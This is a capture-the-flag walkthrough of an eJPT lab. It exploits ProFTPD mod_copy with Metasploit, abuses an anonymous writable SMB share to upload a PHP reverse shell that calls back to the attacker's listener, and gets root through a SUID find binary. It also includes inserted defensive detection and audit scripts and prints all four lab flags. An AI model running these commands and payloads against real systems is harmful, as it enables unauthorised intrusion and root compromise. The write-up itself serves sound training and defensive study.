Host & Network Penetration Testing: Exploitation CTF 3 Walkthrough

This walkthrough covers the third exploitation CTF challenge from the eJPT learning path, demonstrating service exploitation, local enumeration, SMB misconfiguration attacks, and privilege escalation techniques commonly encountered in real-world penetration testing scenarios.

Overview

Target 1: target1.ine.local (192.205.121.3)
Target 2: target2.ine.local (192.205.121.4)
Attacker: 192.205.121.2
Objectives: Exploit vulnerable services and retrieve 4 flags
Key Skills: ProFTPD exploitation, local service enumeration, SMB share abuse, SUID privilege escalation


Target 1: ProFTPD Exploitation & Local Service Enumeration

Challenge 1: Exploiting Vulnerable Service

Objective: “A vulnerable service may be running on target1.ine.local. If exploitable, retrieve the flag from the root directory.”

Step 1: Initial Reconnaissance

Starting with comprehensive port scanning to identify our attack surface:

nmap -sV -sC -O -p- target1.ine.local -oX target1.txt

Nmap Results:

PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.5
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

Key Findings:

  • Port 21: ProFTPD 1.3.5 (FTP service)
  • Port 80: Apache 2.4.41 (Web server)

The Apache server displays a default Ubuntu page, but ProFTPD 1.3.5 stands out as potentially vulnerable. The default page also reveals a useful detail: it mentions that the file being served is /var/www/html/index.html, which tells us the real web root and will matter later.

Step 2: Vulnerability Research

Using searchsploit to identify known exploits for this specific version:

searchsploit ProFTPD 1.3.5

Searchsploit Results:

ProFTPd 1.3.5 - 'mod_copy' Command Execution (Metasploit)     | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution           | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)       | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy                                     | linux/remote/36742.txt

Multiple exploits available for the mod_copy vulnerability. This module allows arbitrary file copying, which can be leveraged for remote code execution when combined with web server access.

Step 3: Metasploit Exploitation

Launching Metasploit and configuring the exploit module:

msfconsole
search ProFTPD 1.3.5
use exploit/unix/ftp/proftpd_modcopy_exec
show options

Initial Configuration:

set rhosts target1.ine.local
set lhost 192.205.121.2
run

Initial Attempt - Failed:

[-] 192.205.121.3:80 - Exploit aborted due to failure: unknown: 192.205.121.3:21 - Failure copying PHP payload to website path, directory not writable?
[*] Exploit completed, but no session was created.

The exploit failed because the default SITEPATH value (/var/www) is incorrect. By examining the Apache default page content, we confirm the web root is actually at /var/www/html.

Corrected Configuration:

set sitepath /var/www/html
run

Exploitation Success:

[*] Started reverse TCP handler on 192.205.121.2:4444 
[*] 192.205.121.3:80 - 192.205.121.3:21 - Connected to FTP server
[*] 192.205.121.3:80 - 192.205.121.3:21 - Sending copy commands to FTP server
[*] 192.205.121.3:80 - Executing PHP payload /7Plrr.php
[*] Command shell session 1 opened (192.205.121.2:4444 -> 192.205.121.3:54408)

Although the module reported errors during its cleanup phase, a command shell session was successfully established. The exploit works by copying a malicious PHP file into the web root via FTP’s SITE CPFR/CPTO commands (the mod_copy feature), then requesting that file through the web server so Apache executes it.
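A defender-side check for the copy trick just described, added here and not part of the original post: it scans an FTP command log for SITE CPFR/CPTO pairs that write a .php file under the web root. The log lines are constructed, and the three-field "client user command" layout is an assumption about how a ProFTPD ExtendedLog might be configured, not the server's default format.

```shell
#!/bin/sh
# Added example, not from the original walkthrough: flag FTP sessions that
# use mod_copy's SITE CPFR / SITE CPTO pair to place a .php file under the
# web root. The log lines are constructed, and the "client user command"
# field layout is an assumption about how your ProFTPD ExtendedLog is set up.

WEBROOT="/var/www/html"

# Constructed sample: a benign copy by a real user, then a copy that lands a
# PHP file in the web root, which is what the walkthrough's exploit does.
SAMPLE_FTP_LOG='192.205.121.9 alice RETR report.pdf
192.205.121.9 alice SITE CPFR report.pdf
192.205.121.9 alice SITE CPTO /home/alice/report-copy.pdf
192.205.121.2 anonymous SITE CPFR banner.txt
192.205.121.2 anonymous SITE CPTO /var/www/html/7Plrr.php'

# Print "client user destination" for every SITE CPTO whose destination is
# a .php file inside WEBROOT. Verb matching is case-insensitive.
web_root_php_copies() {
    printf '%s\n' "$1" | awk -v root="$WEBROOT" '
        toupper($3) == "SITE" && toupper($4) == "CPTO" &&
        index($5, root "/") == 1 && tolower($5) ~ /\.php$/ {
            print $1, $2, $5
        }'
}

# Exit 0 and print the hits when at least one suspicious copy exists,
# exit 1 otherwise, so the function can drive an alert from a cron job.
alert_on_copies() {
    hits=$(web_root_php_copies "$1")
    [ -n "$hits" ] || return 1
    printf 'mod_copy write into web root:\n%s\n' "$hits"
}

alert_on_copies "$SAMPLE_FTP_LOG"
```

Pair this with a read-only web root for the FTP user (or disabling mod_copy outright), so that a matching line is an alert rather than a successful write.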

Step 4: Shell Upgrade

Upgrading the basic shell to a more stable Meterpreter session:

sessions
sessions -u 1
sessions -i 2

Session Upgrade Results:

[*] Upgrading session ID: 1
[*] Sending stage (1017704 bytes) to 192.205.121.3
[*] Meterpreter session 2 opened (192.205.121.2:4433 -> 192.205.121.3:39560)

Step 5: Flag Retrieval

Navigating to the root directory and retrieving the flag:

meterpreter > ls /
meterpreter > cat /flag1.txt

Flag 1 Content:

FLAG1{0a83cebcc5ae418885cb63beda00d0a9}
Remember, the magical word is 'letmein'

🚩 Flag 1: FLAG1{0a83cebcc5ae418885cb63beda00d0a9}

The flag includes a hint about a “magical word” - this will be relevant for the next challenge.


Challenge 2: Local Service Enumeration

Objective: “Further, a quick interaction with a local network service on target1.ine.local may reveal this flag. Use the hint given in the previous flag.”

Step 1: Shell Interaction

Dropping from Meterpreter to a standard shell for better compatibility with system tools:

meterpreter > shell
/bin/bash -i

Step 2: Network Service Enumeration

Enumerating listening services on the target system:

netstat -tulpn

Netstat Results:

Proto Local Address           Foreign Address         State       
tcp   0.0.0.0:21              0.0.0.0:*               LISTEN      
tcp   0.0.0.0:80              0.0.0.0:*               LISTEN      
tcp   127.0.0.11:33345        0.0.0.0:*               LISTEN      
tcp   127.0.0.1:8888          0.0.0.0:*               LISTEN

Analysis: A service is listening on localhost port 8888 - this is only accessible from within the target system, not from external networks. This is why it didn’t appear in our initial nmap scan. Local-only services often contain sensitive information or functionality.

Step 3: Service Interaction

Attempting to connect with curl:

curl http://127.0.0.1:8888

Curl Results:

curl: (1) Received HTTP/0.9 when not allowed

The curl attempt fails because the service does not speak HTTP: curl sees a response with no HTTP status line (what it reports as HTTP/0.9) and refuses it by default. Switching to netcat for raw TCP communication:

nc 127.0.0.1 8888

Service Response:

Enter the secret passphrase: letmein
FLAG2{395a86d12b4949a99b68c499e0eb47ad}

Using the passphrase from Flag 1’s hint successfully retrieves the second flag. This demonstrates how information discovered in one phase of exploitation can be leveraged in subsequent phases.

🚩 Flag 2: FLAG2{395a86d12b4949a99b68c499e0eb47ad}


Target 2: SMB Misconfiguration & Privilege Escalation

Challenge 3: SMB Share Exploitation

Objective: “A misconfigured service running on target2.ine.local may help you gain access to the machine. Can you retrieve the flag from the root directory?”

Step 1: Target Reconnaissance

Scanning the second target for available services:

nmap -sV -sC -O -p- target2.ine.local -oX target2.txt

Nmap Results:

PORT    STATE SERVICE     VERSION
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Can you Pwn me?
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2

Key Findings:

  • Port 80: Apache web server with title “Can you Pwn me?”
  • Ports 139/445: Samba SMB services

The presence of SMB alongside a web server suggests that a file share may back part of the web root; if that share is writable, uploaded files could be served (and, for PHP, executed) by Apache.

Step 2: SMB Vulnerability Research

Checking for known exploits:

searchsploit smbd 4.6.2
searchsploit samba 4.6.2

No direct exploits found for this version. Shifting focus to configuration analysis rather than software vulnerabilities.

Step 3: SMB Share Enumeration

Using Metasploit’s SMB enumeration module:

msfconsole
use auxiliary/scanner/smb/smb_enumshares
set rhosts target2.ine.local
run

Share Enumeration Results:

[+] 192.205.121.4:445 - print$ - (DISK) Printer Drivers
[+] 192.205.121.4:445 - site-uploads - (DISK) 
[+] 192.205.121.4:445 - IPC$ - (IPC|SPECIAL) IPC Service

Analysis: The site-uploads share name strongly suggests it is connected to the web server. This is a common misconfiguration: a share that backs web content is reachable without authentication.

Verifying with smbclient:

smbclient -L target2.ine.local
smbclient //target2.ine.local/site-uploads
# Password: (blank - anonymous access)

SMB Access Results:

Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Nov 19 13:25:31 2024
  ..                                  D        0  Tue Nov 19 13:25:31 2024

Anonymous access granted with an empty share directory.

Step 4: Testing File Upload

Creating a test file to verify write permissions:

nano test.txt
# (create simple test file)

Uploading via SMB:

smb: \> put test.txt
putting file test.txt as \test.txt (0.7 kb/s)

Verifying web accessibility:

  • Navigate to: http://target2.ine.local/site-uploads/test.txt
  • Result: File is accessible through the web server

This confirms we can upload files to the SMB share that are then served by the web server - a critical vulnerability enabling remote code execution.
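A configuration check to go with this finding, added here and not part of the original post: it parses an smb.conf for shares that are both guest-accessible and writable, which is the combination that makes the site-uploads share dangerous. The sample config is constructed and shows the weak share definition beside a hardened one.

```shell
#!/bin/sh
# Added example, not from the original walkthrough: find smb.conf shares
# that are both reachable without credentials and writable, the combination
# that let anonymous uploads reach site-uploads. The config is constructed:
# the first share reproduces the weak settings, the second shows the fix.
# Only share-level settings are examined; [global] defaults are not inherited.

SAMPLE_SMB_CONF='[global]
   workgroup = WORKGROUP

[site-uploads]
   comment = weak: anonymous users can write into the web root
   path = /var/www/html/site-uploads
   guest ok = yes
   read only = no

[site-uploads-fixed]
   comment = hardened: authenticated deploy user only, no guest access
   path = /var/www/html/site-uploads
   guest ok = no
   read only = yes
   valid users = webdeploy'

# Print the name of every non-global share where guest access is on and
# writes are allowed (writable/writeable = yes, or read only = no).
guest_writable_shares() {
    printf '%s\n' "$1" | awk '
        function report() {
            if (share != "" && tolower(share) != "global" &&
                guest == "yes" && writable == "yes") print share
        }
        /^[ \t]*\[/ {                               # new [share] header
            report()
            share = $0
            sub(/^[ \t]*\[/, "", share); sub(/\].*$/, "", share)
            guest = "no"; writable = "no"
            next
        }
        /^[ \t]*[#;]/ { next }                      # comment lines
        /=/ {                                       # key = value lines
            key = $0; sub(/=.*$/, "", key); gsub(/[ \t]/, "", key); key = tolower(key)
            val = $0; sub(/^[^=]*=[ \t]*/, "", val); sub(/[ \t]*$/, "", val); val = tolower(val)
            if ((key == "guestok" || key == "public") && val == "yes") guest = "yes"
            if ((key == "writable" || key == "writeable") && val == "yes") writable = "yes"
            if (key == "readonly" && val == "no") writable = "yes"
        }
        END { report() }'
}

guest_writable_shares "$SAMPLE_SMB_CONF"
```

On a live host, feed it the real file with `guest_writable_shares "$(cat /etc/samba/smb.conf)"`; any share it prints that also lives under the web root is the misconfiguration this challenge exploits.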

Step 5: PHP Reverse Shell Upload

Preparing the payload:

cp /usr/share/webshells/php/php-reverse-shell.php .
nano php-reverse-shell.php

Payload Configuration:

$ip = '192.205.121.2';   // Attacker IP
$port = 1234;            // Listener port

Uploading the reverse shell:

smbclient //target2.ine.local/site-uploads
smb: \> put php-reverse-shell.php

Setting up netcat listener:

nc -lnvp 1234

Triggering the shell by accessing: http://target2.ine.local/site-uploads/php-reverse-shell.php

Connection Received:

connect to [192.205.121.2] from (UNKNOWN) [192.205.121.4] 50906
Linux target2.ine.local 6.8.0-57-generic #59-Ubuntu SMP PREEMPT_DYNAMIC
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Successfully obtained shell access as the www-data user.

Step 6: Flag Retrieval

$ ls /
$ cat /flag3.txt

Flag 3 Content:

FLAG3{6d1ae674a75948a7b5e9c3a20a0264ab}

🚩 Flag 3: FLAG3{6d1ae674a75948a7b5e9c3a20a0264ab}


Challenge 4: Privilege Escalation via SUID

Objective: “Can you escalate to root on target2.ine.local and read the flag from the restricted /root directory?”

Step 1: SUID Binary Enumeration

Searching for SUID binaries that could enable privilege escalation:

find / -type f -perm -4000 -user root 2>/dev/null

Command Explanation:

  • find / - Search from root directory
  • -type f - Only find files
  • -perm -4000 - Find files with SUID bit set
  • -user root - Owned by root user
  • 2>/dev/null - Suppress error messages

SUID Binaries Found:

/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/find         <-- Potential exploit vector
/usr/bin/mount
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/umount

Analysis: The /usr/bin/find binary with SUID permissions is particularly interesting. When a SUID binary runs, it executes with the permissions of its owner (root in this case). The find command’s -exec flag allows arbitrary command execution, creating a privilege escalation opportunity.

Step 2: Exploiting Find for Root Access

Using find’s -exec flag to spawn a privileged shell:

/usr/bin/find . -exec /bin/bash -p \; -quit

Command Breakdown:

  • /usr/bin/find . - Execute find command (with SUID permissions)
  • -exec /bin/bash -p - Execute bash with -p flag (preserves SUID privileges)
  • \; - Terminates the -exec command
  • -quit - Exit after first match

Privilege Escalation Success:

whoami
# root

Root access achieved. The -p flag on bash is crucial here - it prevents bash from dropping the elevated privileges that come from the SUID bit.

Step 3: Final Flag Retrieval

Navigating to the root home directory:

cd /root
ls
cat flag4.txt

Flag 4 Content:

FLAG4{6be1886437f946ac851b2d6b810a7a74}

🚩 Flag 4: FLAG4{6be1886437f946ac851b2d6b810a7a74}


Attack Chain Summary

This exercise demonstrated a complete penetration testing methodology:

Target 1 Attack Flow:

  1. Port Scanning - Identified ProFTPD 1.3.5 and Apache services
  2. Vulnerability Research - Found mod_copy exploit for ProFTPD
  3. Web Root Discovery - Analyzed default page to determine correct path
  4. Initial Exploitation - Used Metasploit to gain command shell
  5. Shell Upgrade - Upgraded to Meterpreter for stability
  6. Local Enumeration - Discovered hidden service on port 8888
  7. Password Reuse - Used hint from Flag 1 to access local service

Target 2 Attack Flow:

  1. Service Enumeration - Identified SMB and web services
  2. Share Analysis - Found misconfigured SMB share with write access
  3. Upload Testing - Verified files in SMB share are web-accessible
  4. Payload Delivery - Uploaded PHP reverse shell
  5. Code Execution - Triggered shell via web access
  6. Privilege Escalation - Exploited SUID find binary for root access

Key Techniques Demonstrated

ProFTPD mod_copy Exploitation - Leveraged file copy vulnerability combined with web server access to achieve remote code execution through carefully placed PHP payloads.

Local Service Discovery - Demonstrated importance of post-exploitation enumeration to discover services only accessible from localhost.

SMB Misconfiguration - Exploited anonymous write access to web-accessible directories for payload delivery.

SUID Privilege Escalation - Used improperly configured SUID binaries to escalate from web server user to root privileges.


Vulnerabilities Exploited

Outdated Software - ProFTPD 1.3.5 contained known vulnerabilities enabling initial access.

Weak Access Controls - SMB share allowed anonymous write access to web-accessible directory.

Improper SUID Configuration - The find binary with SUID permissions enabled trivial privilege escalation.

Service Integration Issues - Combining SMB write access with web server execution created an attack vector that neither service presented on its own.


Defense Strategies

Software Updates: Maintain current versions of all services, particularly internet-facing ones like FTP and web servers.

Least Privilege: Implement strict access controls on file shares and limit write permissions to necessary users only.

SUID Auditing: Regularly audit SUID binaries and remove unnecessary SUID bits from executables that don’t require elevated privileges.
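An audit script for this strategy, added here and not part of the original post: it compares the SUID-root binaries on a host against an allowlist and prints the extras with a suggested fix. Both lists are constructed from the walkthrough's own find output (the allowlist is that output minus find), so they are a starting baseline for this lab host, not an authoritative list for every Ubuntu release.

```shell
#!/bin/sh
# Added example, not from the original walkthrough: compare the SUID-root
# binaries on a host against an allowlist and report anything extra. Both
# lists are constructed from the walkthrough's find output; the allowlist is
# that output minus find, a starting baseline for this host rather than an
# authoritative list for every Ubuntu release.

EXPECTED_SUID='/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/su
/usr/bin/umount'

CURRENT_SUID='/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/find
/usr/bin/mount
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/umount'

# Same search the walkthrough uses, for feeding a live system into the check:
#   unexpected_suid "$(live_suid_root)"
live_suid_root() {
    find / -type f -perm -4000 -user root 2>/dev/null
}

# Print every path in $1 (newline separated) that is not on the allowlist.
# grep treats the newlines inside the -e argument as pattern separators; -x
# and -F make each pattern match a whole line literally. Exit status is 0
# when something unexpected was found, 1 when the host matches the baseline.
unexpected_suid() {
    printf '%s\n' "$1" | grep -vxF -e "$EXPECTED_SUID"
}

# Remediation: clear the SUID bit rather than removing the tool. The command
# is printed, not executed, so the script is safe to run as a plain audit.
suggest_fix() {
    unexpected_suid "$1" | sed 's|^|chmod u-s |'
}

if unexpected_suid "$CURRENT_SUID" >/dev/null; then
    echo "Unexpected SUID-root binaries (suggested fixes):"
    suggest_fix "$CURRENT_SUID"
else
    echo "SUID-root set matches baseline"
fi
```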

Network Segmentation: Restrict access to administrative services and use host-based firewalls to limit exposure.

Service Isolation: Avoid configurations where compromising one service provides access to another.


Captured Flags

  • Flag 1: FLAG1{0a83cebcc5ae418885cb63beda00d0a9} - ProFTPD mod_copy exploitation
  • Flag 2: FLAG2{395a86d12b4949a99b68c499e0eb47ad} - Local service enumeration
  • Flag 3: FLAG3{6d1ae674a75948a7b5e9c3a20a0264ab} - SMB share file upload
  • Flag 4: FLAG4{6be1886437f946ac851b2d6b810a7a74} - SUID privilege escalation

Conclusion

This CTF challenge effectively demonstrates how multiple security weaknesses combine to enable complete system compromise. The progression from service exploitation through local enumeration to privilege escalation illustrates realistic attack patterns that security professionals must understand and defend against.

The key lesson is that security requires a holistic approach - even when individual services appear hardened, misconfigurations and integration issues can create exploitable attack chains. Each phase of this engagement built upon previous discoveries, demonstrating the importance of thorough enumeration and systematic exploitation methodology.

For aspiring penetration testers, this lab reinforces the value of methodical reconnaissance, creative thinking about service interactions, and persistence in post-exploitation enumeration. The combination of automated tools (Metasploit, Nmap) with manual analysis produced the most effective results.

This writeup is part of the eJPT certification journey, demonstrating practical penetration testing skills in a controlled lab environment.

This post is licensed under CC BY 4.0 by the author.